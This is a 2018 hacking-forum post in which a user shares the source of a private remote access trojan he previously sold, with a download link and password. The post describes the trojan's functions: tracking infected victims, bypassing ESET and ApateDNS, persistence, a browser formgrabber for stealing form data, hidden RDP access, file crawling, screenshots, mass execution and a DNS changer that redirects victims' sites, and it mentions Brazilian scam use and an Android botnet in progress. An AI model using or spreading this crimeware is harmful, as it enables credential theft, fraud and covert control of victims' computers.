Popular Post C.Oy Posted January 23, 2018 Popular Post Share Posted January 23, 2018 (edited) Hello my dears. Many months ago I was marketing versions of this rat. Currently I am already with other systems so I decided to share with you soon the source, only for active users in the forum because it is a private rat that still works some functions. It uses php connection, so you do not need to open ports on your modem. Recommended to use with XAMP + VPS Permissions for files and folders should be 0777 Stable connection creates folders + id of all infected victims. To detect the ID of each machine, the victims have a dll that is created with an ID, this ID is not saved in the .exe, it will look in the folders to identify where it is. Functions: -Check Status Online - Run Windows - Bypass ESET - Bypass ApateDNS - Persist Files [brazil Fakes/Scam] * It does not work in other countries, it is useless. -FormGrabber * The Formgrabber works through html page IDs, the webbrowser is injected into the default browser exactly in the correct proportions, so websites supported by the webbrowser will be captured giving formgrabber effect. -Hide RDP * Currently it does not work, I just changed the registry of the victim the connection port to some open port and put it to accept 2 users. simple. (I used the RDP Wrapper Library v1.6.1 example https://github.com/stascorp/rdpwrap/releases) - File manager * Pulling Files for Exemptions (Crawler in Folders) -Take Screen Print - Mass Execution - DNS Changer * Through a javascript I get the default browser resolution, and then I configure to monitor the sites that the person wants to redirect, and I put it in the same proportion. This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up [HIDE-THANKS] Pass: $activeuser = "PM"; Download: https://www.sendspace.com/file/zcq5w9 [/HIDE-THANKS] *I am currently working on an android botnet. Edited January 23, 2018 by C.Oy Link to comment Share on other sites More sharing options...
Recommended Posts